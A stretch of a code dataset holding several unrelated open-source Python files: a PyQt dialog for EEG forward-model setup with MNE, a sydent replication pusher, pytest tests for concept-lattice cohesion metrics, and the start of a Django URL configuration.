self._available_forwards[montage].keys()\n )\n self.spacing = self.default_spacing\n self._set_forwards_combo_to_available()\n\n def _set_forwards_combo_to_available(self):\n if self._available_forwards:\n self._forwards_combo.setItems(\n self._available_forwards[self.montage][self.spacing]\n )\n\n def _on_montage_combo_changed(self):\n \"\"\"\n If using available forwards, fetch all available spacings and forwards\n for selected montage; set self.montage\n\n \"\"\"\n if self.is_use_available:\n self._set_spacings_combo_to_available()\n\n # if self._forwards_combo.currentText():\n # self.is_valid = True\n # else:\n # self.is_valid = False\n if self._custom_montage_widget.checkbox.isChecked():\n self._custom_montage_widget.lineedit.setText(\n self._montages_combo.currentText()\n )\n QTimer.singleShot(0, self._check_if_valid)\n\n def _on_spacings_combo_changed(self):\n if self.is_use_available:\n self._set_forwards_combo_to_available()\n QTimer.singleShot(0, self._check_if_valid)\n\n def _on_import_montage_radio_toggled(self):\n if self._use_default_montage_radio.isChecked():\n self._select_montage_dialog.setDisabled(True)\n self._montages_combo_widget.setDisabled(False)\n else: # 'compute forward' case\n self._select_montage_dialog.setDisabled(False)\n self._montages_combo_widget.setDisabled(True)\n self._select_montage_dialog.browse_button.setFocus()\n QTimer.singleShot(0, self._check_if_valid)\n\n def _on_montage_path_changed(self):\n # if self._select_montage_dialog.path_ledit.text():\n # self.is_valid = True\n if self._custom_montage_widget.checkbox.isChecked():\n self._custom_montage_widget.lineedit.setText(\n self._select_montage_dialog.path_ledit.text()\n )\n QTimer.singleShot(0, self._check_if_valid)\n\n def _check_if_valid(self):\n is_montage_valid = self._check_montage()\n if self.is_use_available and not self.fwd_name:\n is_forward_ok = False\n else:\n is_forward_ok = True\n self.is_valid = is_montage_valid and is_forward_ok\n if not is_montage_valid:\n self.parent()._dialog_buttons.button(\n QDialogButtonBox.Ok\n ).setToolTip(\n \"Data and forward channel names dont match.\"\n \" Please edit montage or select another forward.\"\n )\n elif not is_forward_ok:\n self.parent()._dialog_buttons.button(\n QDialogButtonBox.Ok\n ).setToolTip(\"Forward model is missing.\")\n else:\n self.parent()._dialog_buttons.button(\n QDialogButtonBox.Ok\n ).setToolTip(\"\")\n\n def _check_montage(self):\n montage_name = self.montage\n if montage_name != \"imported\":\n try:\n montage = mne.channels.read_montage(montage_name)\n except ValueError:\n montage_path = op.join(MONTAGES_DIR, montage_name) + \".elc\"\n try:\n montage = mne.channels.read_montage(montage_path)\n except Exception:\n return False\n ch_names_forward = montage.ch_names\n else:\n fwd_path = op.join(\n self._anat_folder, self.montage, self.spacing, self.fwd_name\n )\n fwd = mne.read_forward_solution(fwd_path)\n ch_names_forward = fwd[\"info\"][\"ch_names\"]\n\n data_chnames_upper = [d.upper() for d in self._data_chnames]\n ch_names_intersect = [\n n for n in ch_names_forward if n.upper() in data_chnames_upper\n ]\n if len(ch_names_intersect) > 0.2 * len(self._data_chnames):\n return True\n else:\n return False\n\n @property\n def montage(self):\n montage = None\n if not self._custom_montage_widget.checkbox.isChecked():\n if self._use_default_montage_radio.isChecked():\n montage = self._montages_combo.currentText()\n else:\n montage = self._select_montage_dialog.path_ledit.text()\n else:\n montage = self._custom_montage_widget.lineedit.text()\n return montage\n\n @montage.setter\n def montage(self, value):\n if not self._custom_montage_widget.checkbox.isChecked():\n if self._use_default_montage_radio.isChecked():\n self._montages_combo.setCurrentText(value)\n else:\n self._select_montage_dialog.path_ledit.setText(value)\n else:\n self._custom_montage_widget.lineedit.setText(value)\n\n @property\n def spacing(self):\n return self._spacings_combo.currentText()\n\n @spacing.setter\n def spacing(self, value):\n self._spacings_combo.setCurrentText(value)\n\n @property\n def fwd_name(self):\n return self._forwards_combo.currentText()\n\n @fwd_name.setter\n def fwd_name(self, value):\n self._forwards_combo.setCurrentText(value)\n\n @property\n def is_use_available(self):\n return self._is_use_available\n\n @is_use_available.setter\n def is_use_available(self, value):\n self._is_use_available = value\n self._use_default_montage_radio.setChecked(True)\n if value:\n self._set_combos_to_available()\n else:\n # forward computation case\n self._set_combos_to_builtin()\n\n def _on_edit_montage_button_clicked(self):\n m = mne.channels.read_montage(self.montage)\n montage_editor = MontageEditor(self._data_chnames, m, self)\n montage_editor.exec()\n if montage_editor.result():\n self.montage = montage_editor.montage_path\n QTimer.singleShot(0, self._check_if_valid)\n\n def _on_custom_montage_checkbox_toggled(self, state):\n if state:\n if self._use_default_montage_radio.isChecked():\n montage = self._montages_combo.currentText()\n else:\n montage = self._select_montage_dialog.path_ledit.text()\n self._custom_montage_widget.lineedit.setText(montage)\n\n\nclass _ImportFwdGroupbox(_StateAwareGroupbox):\n \"\"\"Groupbox for loading forward model from file\"\"\"\n\n def __init__(\n self, title=\"Import forward model\", parent=None, data_chnames=None\n ):\n _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n self._data_chnames = data_chnames\n self.is_valid = False\n self.is_active = False\n self.select_fwd_dialog = _FileSelectorWidget(\n dialog_caption=\"Select forward model\",\n path=\"\",\n file_filter=\"*fwd.fif\",\n )\n\n self.select_fwd_dialog.path_ledit.textChanged.connect(\n self._on_path_changed\n )\n\n import_fwd_layout = QVBoxLayout()\n import_fwd_layout.addWidget(self.select_fwd_dialog)\n\n self.setLayout(import_fwd_layout)\n self.setVisible(True)\n\n def _on_path_changed(self):\n fwd_path = self.select_fwd_dialog.path_ledit.text()\n fwd = mne.read_forward_solution(fwd_path)\n ch_names_forward = fwd[\"info\"][\"ch_names\"]\n\n data_chnames_upper = [d.upper() for d in self._data_chnames]\n ch_names_intersect = [\n n for n in ch_names_forward if n.upper() in data_chnames_upper\n ]\n if len(ch_names_intersect) > 0.2 * len(self._data_chnames):\n self.parent()._dialog_buttons.button(\n QDialogButtonBox.Ok\n ).setToolTip(\"\")\n self.is_valid = True\n else:\n self.parent()._dialog_buttons.button(\n QDialogButtonBox.Ok\n ).setToolTip(\n \"Data and forward channel names dont match.\"\n \" Please select another forward.\"\n )\n self.is_valid = False\n\n\nclass _ComputeFwdGroupbox(_StateAwareGroupbox):\n \"\"\"Groupbox with parameters for forward computation\"\"\"\n\n def __init__(self, title=\"Forward computation parameters\", parent=None):\n _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n\n self.default_coreg_file = None\n self._is_valid = True\n self.is_active = False\n # -------- create widgets -------- #\n self._no_coreg_radio = QRadioButton(\"None\")\n self._select_coreg_radio = QRadioButton(\"Select\")\n self._select_coreg_widget = _FileSelectorWidget(\n dialog_caption=\"Select coregistration file\",\n file_filter=\"*trans.fif\",\n )\n\n cond_defaults = self._get_default_mne_conductivities()\n self._brain_conductivity_spinbox = QDoubleSpinBox(\n singleStep=0.001, decimals=3, value=cond_defaults[0]\n )\n\n self._skull_conductivity_spinbox = QDoubleSpinBox(\n singleStep=0.001, decimals=3, value=cond_defaults[1]\n )\n\n self._scalp_conductivity_spinbox = QDoubleSpinBox(\n singleStep=0.001, decimals=3, value=cond_defaults[2]\n )\n\n conductivity_label = QLabel(\"Conductivities:\")\n conductivity_label.setBuddy(self._brain_conductivity_spinbox)\n # -------------------------------- #\n\n # -------- connect and setup widgets -------- #\n self._no_coreg_radio.setChecked(True)\n self._no_coreg_radio.toggled.connect(self._on_toggled)\n self._select_coreg_radio.toggled.connect(self._on_toggled)\n self._select_coreg_widget.setDisabled(True)\n\n self._select_coreg_widget.path_ledit.textChanged.connect(\n self._on_path_changed\n )\n # ------------------------------------------------- #\n\n # Coregistration subgpbox\n coreg_layout = QVBoxLayout()\n coreg_layout.addWidget(self._no_coreg_radio)\n coreg_layout.addWidget(self._select_coreg_radio)\n coreg_layout.addWidget(self._select_coreg_widget)\n\n coreg_gpbox = QGroupBox(\"Coregistration file\")\n coreg_gpbox.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)\n coreg_gpbox.setLayout(coreg_layout)\n ##\n\n conductivity_layout = QHBoxLayout()\n conductivity_layout.addWidget(conductivity_label)\n conductivity_layout.addWidget(self._brain_conductivity_spinbox)\n conductivity_layout.addWidget(self._skull_conductivity_spinbox)\n conductivity_layout.addWidget(self._scalp_conductivity_spinbox)\n\n compute_fwd_layout = QVBoxLayout()\n compute_fwd_layout.addWidget(coreg_gpbox)\n compute_fwd_layout.addLayout(conductivity_layout)\n self.setLayout(compute_fwd_layout)\n\n def _get_default_mne_conductivities(self):\n sign = inspect.signature(mne.make_bem_model)\n return sign.parameters[\"conductivity\"].default\n\n def _on_toggled(self):\n if self._no_coreg_radio.isChecked():\n self._select_coreg_widget.setDisabled(True)\n self.is_valid = True\n else:\n self._select_coreg_widget.setDisabled(False)\n if self._select_coreg_widget.path_ledit.text():\n self.is_valid = True\n else:\n self.is_valid = False\n self._select_coreg_widget.browse_button.setFocus()\n\n def _on_path_changed(self):\n if self._select_coreg_widget.path_ledit.text():\n self.is_valid = True\n\n @property\n def conductivity(self):\n conductivity = (\n self._brain_conductivity_spinbox.value(),\n self._skull_conductivity_spinbox.value(),\n self._scalp_conductivity_spinbox.value(),\n )\n return conductivity\n\n @property\n def trans_file(self):\n trans_file = self._select_coreg_widget.path_ledit.text()\n if trans_file:\n return trans_file\n else:\n return None\n\n\nclass BadInputFile(Exception):\n pass\n\n\nclass ComputeFwdInThread(ThreadToBeWaitedFor):\n \"\"\"Compute forward model in parallel thread\"\"\"\n\n def __init__(\n self,\n montage,\n subjects_dir,\n subject,\n spacing,\n conductivity,\n trans_file,\n dest_dir,\n n_jobs=8,\n verbose=\"ERROR\",\n parent=None,\n ):\n ThreadToBeWaitedFor.__init__(self, parent=parent)\n self.progress_text = \"Computing forward model... Please be patient.\"\n self.error_text = \"Forward model computation failed.\"\n self.montage = montage\n self.subjects_dir = subjects_dir\n self.subject = subject\n self.spacing = spacing\n self.conductivity = conductivity\n self.trans_file = trans_file\n self.dest_dir = dest_dir\n self.n_jobs = n_jobs\n self.verbose = verbose\n self.fwd_savename = None\n self.is_show_progress = True\n\n montage_kind = op.splitext(op.basename(montage))[0]\n fwd_name = \"-\".join([subject, \"eeg\", spacing, montage_kind, \"fwd.fif\"])\n self.fwd_savename = op.join(dest_dir, montage_kind, spacing, fwd_name)\n\n self._logger = logging.getLogger(type(self).__name__)\n\n def no_blocking_execution(self):\n if op.isfile(self.fwd_savename):\n ans = QMessageBox.question(\n self.parent(),\n \"Destination file exists\",\n 'Forward model file \"%s\" already exists.'\n \" Recomtute?\" % self.fwd_savename,\n QMessageBox.Yes | QMessageBox.No,\n )\n if ans == QMessageBox.Yes:\n return ThreadToBeWaitedFor.no_blocking_execution(self)\n else:\n return True # success since forward model is already there\n else:\n return ThreadToBeWaitedFor.no_blocking_execution(self)\n\n def _run(self):\n \"\"\"Compute 3-layer BEM based forward model from montage and anatomy\"\"\"\n montage = self.montage\n subjects_dir = self.subjects_dir\n subject = self.subject\n spacing = self.spacing\n conductivity = self.conductivity\n trans_file = self.trans_file\n dest_dir = self.dest_dir\n n_jobs = self.n_jobs\n verbose = self.verbose\n self._logger.debug(\"Computing forward with the following parameters.\")\n self._logger.debug(\"montage: %s\", montage)\n self._logger.debug(\"SUBJECT: %s\", subject)\n self._logger.debug(\"SUBJECTS_DIR: %s\", subjects_dir)\n self._logger.debug(\"spacing: %s\", spacing)\n self._logger.debug(\"trans_file: %s\", trans_file)\n self._logger.debug(\"conductivity: %s\", conductivity)\n self._logger.debug(\"dest_dir: %s\", dest_dir)\n\n try:\n montage = mne.channels.read_montage(kind=montage)\n except Exception:\n raise BadInputFile(\"Bad montage file: %s\" % montage)\n\n os.makedirs(op.dirname(self.fwd_savename), exist_ok=True)\n\n fiducials = [\"LPA\", \"RPA\", \"Nz\", \"FidT9\", \"FidT10\", \"FidNz\"]\n self._logger.info(\"Setting up the source space ...\")\n src = mne.setup_source_space(\n subject,\n spacing=spacing,\n subjects_dir=subjects_dir,\n add_dist=False,\n verbose=verbose,\n )\n self.progress_updated.emit(25)\n\n # raise Exception('Some catastrophic shit happened')\n self._logger.info(\"Creating bem model (be patient) ...\")\n model = mne.make_bem_model(\n subject=subject,\n ico=4,\n conductivity=conductivity,\n subjects_dir=subjects_dir,\n verbose=verbose,\n )\n self.progress_updated.emit(50)\n bem = mne.make_bem_solution(model, verbose=verbose)\n self.progress_updated.emit(75)\n if not trans_file:\n trans_file = None\n n_jobs = n_jobs\n self._logger.info(\"Computing forward solution (be patient) ...\")\n ch_names = montage.ch_names\n ch_names = [c for c in ch_names if c not in fiducials]\n info = mne.create_info(ch_names, sfreq=1, ch_types=\"eeg\")\n raw = mne.io.RawArray(\n np.ones([len(info[\"ch_names\"]), 1]), info, verbose=verbose\n )\n raw.set_montage(montage)\n\n ch_names = montage.ch_names\n ch_names = [c for c in ch_names if c not in fiducials]\n fwd = mne.make_forward_solution(\n raw.info,\n trans=trans_file,\n src=src,\n bem=bem,\n meg=False,\n eeg=True,\n mindist=5.0,\n n_jobs=n_jobs,\n verbose=verbose,\n )\n self.progress_updated.emit(100)\n\n mne.write_forward_solution(\n self.fwd_savename, fwd, overwrite=True, verbose=verbose\n )\n\n\nclass FwdSetupDialog(QDialog):\n \"\"\"\n Dialog window for anatomy and forward model setup\n\n Launch dialog window which sets up fwd_path, subjects_dir and subject\n attributes\n\n Parameters\n ----------\n parent: QObject, optional, default: None\n Parent PyQt widget\n\n Attributes\n ----------\n fwd_path: str\n Path to forward model file\n subjects_dir: str\n Path to freesurfer SUBJECTS_DIR\n subject: str\n subject name corresponding to a subfolder of SUBJECTS_DIR\n\n \"\"\"\n\n def __init__(\n self, parent=None, subjects_dir=None, subject=None, data_chnames=None\n ):\n QDialog.__init__(self, parent)\n\n self._is_ok_to_close = True\n # -------- create widgets -------- #\n self._anat_gpbox = _AnatGroupbox(subjects_dir=None, subject=None)\n self._forward_gpbox = _FwdOptionsRadioButtons()\n self._fwd_geom_gpbox = _FwdGeomGroupbox(\n self._anat_gpbox.default_subj, data_chnames=data_chnames\n )\n self._compute_fwd_gpbox = _ComputeFwdGroupbox()\n self._import_fwd_gpbox = _ImportFwdGroupbox(data_chnames=data_chnames)\n # -------------------------------- #\n\n # -------- setup widgets and connects slots -------- #\n self._compute_fwd_gpbox.is_active = False\n self._import_fwd_gpbox.is_active = False\n\n self._anat_gpbox.import_anat_radio.toggled.connect(\n self._on_anat_radio_toggled\n )\n self._anat_gpbox.subject_combobox.currentTextChanged.connect(\n self._reset_forward_groupbox\n )\n\n self._forward_gpbox.use_default_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n\n self._forward_gpbox.import_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n self._forward_gpbox.import_fwd_radio.toggled.connect(\n self._import_fwd_gpbox.select_fwd_dialog.browse_button.setFocus\n )\n\n self._forward_gpbox.compute_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n\n self._anat_gpbox.state_changed.connect(self._states_changed)\n self._compute_fwd_gpbox.state_changed.connect(self._states_changed)\n self._import_fwd_gpbox.state_changed.connect(self._states_changed)\n self._fwd_geom_gpbox.state_changed.connect(self._states_changed)\n # -------------------------------------------------- #\n\n # ------------- layout ------------- #\n main_layout = QHBoxLayout()\n main_layout.addWidget(self._anat_gpbox)\n main_layout.addWidget(self._forward_gpbox)\n main_layout.addWidget(self._fwd_geom_gpbox)\n main_layout.addWidget(self._import_fwd_gpbox)\n main_layout.addWidget(self._compute_fwd_gpbox)\n\n outer_layout = QVBoxLayout()\n self._dialog_buttons = QDialogButtonBox(\n QDialogButtonBox.Ok | QDialogButtonBox.Cancel\n )\n self._dialog_buttons.accepted.connect(self._on_ok)\n self._dialog_buttons.rejected.connect(self.reject)\n outer_layout.addLayout(main_layout)\n outer_layout.addWidget(self._dialog_buttons)\n self.setLayout(outer_layout)\n # ---------------------------------- #\n\n self.subjects_dir = None\n self.subject = None\n self.fwd_path = None\n\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n\n self._logger = logging.getLogger(type(self).__name__)\n\n def _on_anat_radio_toggled(self):\n if self._anat_gpbox.import_anat_radio.isChecked():\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n self._forward_gpbox.compute_fwd_radio.setChecked(True)\n self._forward_gpbox.use_default_fwd_radio.setDisabled(True)\n else:\n self._forward_gpbox.use_default_fwd_radio.setDisabled(False)\n\n def _on_fwd_option_toggled(self):\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = False\n self._compute_fwd_gpbox.is_active = False\n self._fwd_geom_gpbox.is_active = True\n self._fwd_geom_gpbox.get_available_forwards(\n op.join(COGNIGRAPH_DATA, \"forwards\", self._anat_gpbox.subject)\n )\n self._fwd_geom_gpbox.is_use_available = True\n self._fwd_geom_gpbox._custom_montage_widget.checkbox.setCheckState(\n False\n )\n elif self._forward_gpbox.import_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = True\n self._compute_fwd_gpbox.is_active = False\n self._fwd_geom_gpbox.is_active = False\n self._fwd_geom_gpbox._custom_montage_widget.checkbox.setCheckState(\n False\n )\n elif self._forward_gpbox.compute_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = False\n self._compute_fwd_gpbox.is_active = True\n self._fwd_geom_gpbox.is_active = True\n self._fwd_geom_gpbox.is_use_available = False\n QTimer.singleShot(0, self._fixSize)\n\n def _fixSize(self):\n \"\"\"Fix widget size after some of subwidgets were hidden\"\"\"\n size = self.sizeHint()\n self.resize(size)\n\n def _states_changed(self):\n anat_is_good = self._anat_gpbox.is_good\n comp_is_good = self._compute_fwd_gpbox.is_good\n imp_is_good = self._import_fwd_gpbox.is_good\n geom_is_good = self._fwd_geom_gpbox.is_good\n if comp_is_good and imp_is_good and geom_is_good and anat_is_good:\n self._dialog_buttons.button(QDialogButtonBox.Ok).setDisabled(False)\n else:\n self._dialog_buttons.button(QDialogButtonBox.Ok).setDisabled(True)\n\n def _on_ok(self):\n \"\"\"Called when OK button is clicked\"\"\"\n self.is_ok_to_close = True\n self.subjects_dir = self._anat_gpbox.subjects_dir\n self._logger.debug('Subjects dir is set to \"%s\".' % self.subjects_dir)\n self.subject = self._anat_gpbox.subject\n self._logger.debug('Subject is set to \"%s\"' % self.subject)\n if self._anat_gpbox.import_anat_radio.isChecked():\n self._copy_anat_to_folders_struct(self.subjects_dir, self.subject)\n self._cur_anat_fwds_path = op.join(\n COGNIGRAPH_DATA, \"forwards\", self.subject\n )\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n montage = self._fwd_geom_gpbox.montage\n spacing = self._fwd_geom_gpbox.spacing\n fwd_name = self._fwd_geom_gpbox.fwd_name\n self.fwd_path = op.join(\n self._cur_anat_fwds_path, montage, spacing, fwd_name\n )\n\n elif self._forward_gpbox.import_fwd_radio.isChecked():\n path = self._import_fwd_gpbox.select_fwd_dialog.path_ledit.text()\n if op.isfile(path):\n try:\n self.fwd_path = self._copy_fwd_to_folders_struct(path)\n except Exception as e:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Warning)\n msg.setText(\n \"Failed to copy %s inside\"\n \" cognigraph folders structure\" % path\n )\n msg.setDetailedText(str(e))\n msg.show()\n else:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Warning)\n msg.setText(\"%s is not a file\" % path)\n\n elif self._forward_gpbox.compute_fwd_radio.isChecked():\n # -------------------- gather parameters -------------------- #\n conductivity = self._compute_fwd_gpbox.conductivity\n montage = self._fwd_geom_gpbox.montage\n spacing = self._fwd_geom_gpbox.spacing\n trans_file = self._compute_fwd_gpbox.trans_file\n dest_dir = self._cur_anat_fwds_path\n # ----------------------------------------------------------- #\n\n thread_run = ComputeFwdInThread(\n montage,\n self.subjects_dir,\n self.subject,\n spacing,\n conductivity,\n trans_file,\n dest_dir,\n n_jobs=1,\n verbose=\"ERROR\",\n parent=self,\n )\n self._is_ok_to_close = thread_run.no_blocking_execution()\n if self._is_ok_to_close:\n self.fwd_path = thread_run.fwd_savename\n\n if self._is_ok_to_close:\n self._logger.debug(\n 'Forward model path is set to \"%s\"' % self.fwd_path\n )\n self.accept()\n\n def _copy_fwd_to_folders_struct(\n self, src_path, montage=\"imported\", spacing=\"imported\"\n ):\n dest_dir = op.join(self._cur_anat_fwds_path, montage, spacing)\n fname = op.split(src_path)[1]\n dest_path = op.join(dest_dir, fname)\n try:\n os.makedirs(dest_dir)\n except OSError:\n self._logger.warning(\"Destination folder %s exists.\" % dest_dir)\n self._logger.info(\"Copying to %s\" % dest_dir)\n try:\n shutil.copyfile(src_path, dest_path)\n except shutil.SameFileError:\n self._logger.warning(\"File is already there. Skipping..\")\n\n return dest_path\n\n def _copy_anat_to_folders_struct(self, src_subjects_dir, subject):\n dest_subjects_dir = op.join(COGNIGRAPH_DATA, \"anatomy\")\n src_path = op.join(src_subjects_dir, subject)\n dest_path = op.join(dest_subjects_dir, subject)\n if not op.isdir(op.join(dest_subjects_dir, subject)):\n self._logger.info(\"Copying anatomy to %s \" % dest_subjects_dir)\n shutil.copytree(src_path, dest_path)\n elif src_path != dest_path:\n answer = QMessageBox.question(\n self,\n \"Destination folder exists\",\n 'Anatomy for subject \"%s\" exists. Overwrite?' % subject,\n QMessageBox.Yes | QMessageBox.No,\n )\n if answer == QMessageBox.Yes:\n self._logger.info(\n \"Overwriting anatomy for subject %s.\" % subject\n )\n shutil.rmtree(dest_path)\n shutil.copytree(src_path, dest_path)\n else:\n self._logger.info(\n \"Keeping existing anatomy for subject %s.\" % subject\n )\n else:\n self._logger.info(\n \"Source and destination folders are the same.\" \" Skipping.\"\n )\n return dest_path\n\n def _reset_forward_groupbox(self):\n if (\n self._anat_gpbox.is_use_available_anat\n and self._forward_gpbox.use_default_fwd_radio.isChecked()\n ):\n self._fwd_geom_gpbox.get_available_forwards(\n op.join(COGNIGRAPH_DATA, \"forwards\", self._anat_gpbox.subject)\n )\n self._fwd_geom_gpbox.is_use_available = True\n\n\nif __name__ == \"__main__\":\n from PyQt5.QtWidgets import QApplication\n import sys\n\n format = \"%(asctime)s:%(name)-17s:%(levelname)s:%(message)s\"\n logging.basicConfig(level=logging.DEBUG, filename=None, format=format)\n\n class MW(QMainWindow):\n def __init__(self, parent=None):\n QMainWindow.__init__(self, parent)\n self.button = QPushButton(\"Push me\")\n self.button.clicked.connect(self._on_clicked)\n self.dialog = FwdSetupDialog(parent=self)\n self.setCentralWidget(self.button)\n\n def _on_clicked(self):\n self.dialog.show()\n\n app = QApplication(sys.argv)\n # wind = MW()\n # wind.setAttribute(Qt.WA_DeleteOnClose)\n\n dialog = FwdSetupDialog()\n dialog.show()\n # wind.show()\n # wind.show()\n # app.exec_()\n\n sys.exit(app.exec_())\n","sub_path":"cognigraph/gui/forward_dialog.py","file_name":"forward_dialog.py","file_ext":"py","file_size_in_byte":49673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"214892300","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2014 OpenMarket Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\n\nimport twisted.internet.task\n\nfrom sydent.util import time_msec\nfrom sydent.replication.peer import LocalPeer\nfrom sydent.db.threepid_associations import LocalAssociationStore\nfrom sydent.db.peers import PeerStore\nfrom sydent.threepid.signer import Signer\n\nlogger = logging.getLogger(__name__)\n\n\nclass Pusher:\n def __init__(self, sydent):\n self.sydent = sydent\n self.pushing = False\n self.peerStore = PeerStore(self.sydent)\n\n def setup(self):\n cb = twisted.internet.task.LoopingCall(Pusher.scheduledPush, self)\n cb.clock = self.sydent.reactor\n cb.start(10.0)\n\n def getSignedAssociationsAfterId(self, afterId, limit):\n assocs = {}\n\n localAssocStore = LocalAssociationStore(self.sydent)\n (localAssocs, maxId) = localAssocStore.getAssociationsAfterId(afterId, limit)\n\n signer = Signer(self.sydent)\n\n for localId in localAssocs:\n sgAssoc = signer.signedThreePidAssociation(localAssocs[localId])\n assocs[localId] = sgAssoc\n\n return (assocs, maxId)\n\n def doLocalPush(self):\n \"\"\"\n Synchronously push local associations to this server (ie. copy them to globals table)\n The local server is essentially treated the same as any other peer except we don't do the\n network round-trip and this function can be used so the association goes into the global table\n before the http call returns (so clients know it will be available on at least the same ID server they used)\n \"\"\"\n localPeer = LocalPeer(self.sydent)\n\n (signedAssocs, _) = self.getSignedAssociationsAfterId(localPeer.lastId, None)\n\n localPeer.pushUpdates(signedAssocs)\n\n def scheduledPush(self):\n if self.pushing:\n return\n self.pushing = True\n\n updateDeferred = None\n\n try:\n peers = self.peerStore.getAllPeers()\n\n for p in peers:\n if p.lastSentVersion:\n logger.debug(\"Looking for update after %d to push to %s\", p.lastSentVersion, p.servername)\n else:\n logger.debug(\"Looking for update to push to %s\", p.servername)\n (signedAssocTuples, maxId) = self.getSignedAssociationsAfterId(p.lastSentVersion, 100)\n logger.debug(\"%d updates to push to %s\", len(signedAssocTuples), p.servername)\n if len(signedAssocTuples) > 0:\n logger.info(\"Pushing %d updates to %s\", len(signedAssocTuples), p.servername)\n updateDeferred = p.pushUpdates(signedAssocTuples)\n updateDeferred.addCallback(self._pushSucceeded, peer=p, maxId=maxId)\n updateDeferred.addErrback(self._pushFailed, peer=p)\n break\n finally:\n if not updateDeferred:\n self.pushing = False\n\n def _pushSucceeded(self, result, peer, maxId):\n logger.info(\"Pushed updates up to %d to %s with result %d %s\",\n maxId, peer.servername, result.code, result.phrase)\n\n self.peerStore.setLastSentVersionAndPokeSucceeded(peer.servername, maxId, time_msec())\n\n self.pushing = False\n self.scheduledPush()\n\n def _pushFailed(self, failure, peer):\n logger.info(\"Failed to push updates to %s: %s\", peer.servername, failure)\n self.pushing = False\n return None\n","sub_path":"sydent/replication/pusher.py","file_name":"pusher.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151064797","text":"import numpy as np\nimport pandas as pd\nimport pytest\nfrom fca import Concept, Context\nfrom fca.metrics import concept_cohesion, object_similarity\n\n\n@pytest.fixture\ndef context_animals():\n columns = [\n 'give milk',\n 'give meat',\n 'give wool or coat',\n 'give eggs',\n 'suitable for towing'\n ]\n\n rows = [\n 'chicken',\n 'turkey',\n 'horse',\n 'donkey',\n 'duck',\n 'goose',\n 'sheep',\n 'goat'\n ]\n\n data = np.array(\n (\n (0, 1, 0, 1, 0),\n (0, 1, 0, 1, 0),\n (0, 1, 0, 0, 1),\n (0, 1, 0, 0, 1),\n (0, 1, 1, 1, 0),\n (0, 1, 1, 0, 0),\n (1, 1, 1, 0, 0),\n (1, 1, 0, 0, 0)\n ),\n dtype=bool\n )\n\n context = Context(pd.DataFrame(data=data, index=rows, columns=columns))\n\n return context\n\n@pytest.fixture\ndef context():\n data = np.array(((True, True, False),\n (True, False, False),\n (False, True, False)))\n\n return Context(pd.DataFrame(data))\n\n\nclass TestConceptMinimalCoherence():\n def test_concept_minimal_smc_cohesion(self, context):\n concept = Concept(np.ones(3, dtype=bool),\n np.zeros(3, dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.smc)\n\n assert cohesion == 1 / 3\n\n def test_concept_minimal_smc_cohesion2(self, context):\n concept = Concept(np.array([True, True, False], dtype=bool),\n np.array([True, False, False], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.smc)\n\n assert cohesion == 2 / 3\n\n def test_concept_minimal_jaccard_cohesion(self, context):\n concept = Concept(np.array([True, False, False], dtype=bool),\n np.array([True, True, False], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.jaccard)\n\n assert cohesion == 1\n\n def test_concept_minimal_jaccard_cohesion2(self, context):\n concept = Concept(np.array([False, False, False], dtype=bool),\n np.array([True, True, True], dtype=bool))\n\n cohesion = concept_cohesion.minimal(\n concept,\n context,\n object_similarity.jaccard)\n\n assert cohesion == 0\n\nclass TestConceptAvgCoherence():\n def test_concept_avg_jaccard_cohesion(self, context_animals):\n\n concept = Concept(np.ones(8, dtype=bool),\n np.array([False, True, False, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == pytest.approx(0.4255952, 0.00001)\n\n def test_concept_avg_jaccard_cohesion2(self, context_animals):\n concept = Concept(np.array([False, False, False, False, False, False, True, True]),\n np.array([True, True, False, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == pytest.approx(0.6666666, 0.00001)\n\n def test_concept_avg_jaccard_cohesion3(self, context_animals):\n concept = Concept(np.array([False, False, False, False, False, False, True, False]),\n np.array([True, True, True, False, False]))\n\n cohesion = concept_cohesion.avg(\n concept,\n context_animals,\n object_similarity.jaccard)\n\n assert cohesion == 1\n","sub_path":"fca/metrics/tests/test_concept_cohesion.py","file_name":"test_concept_cohesion.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"592588011","text":"from django.urls import path, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom . import views\n\nurlpatterns = [\n\tpath('upload_icollect/', views.upload_icollect, name='upload_icollect'),\n\tpath('neftswift/', views.neftswift, name='neftswift'),\n\tpath('getrawpayments/', views.getrawpayments, name='getrawpayments'),\n\tpath('getstudent/', views.getstudent, name='getstudent'),\n\tpath('editrawpayment/', views.editrawpayment, name='editrawpayment'),\n\tpath('updatetransaction/', 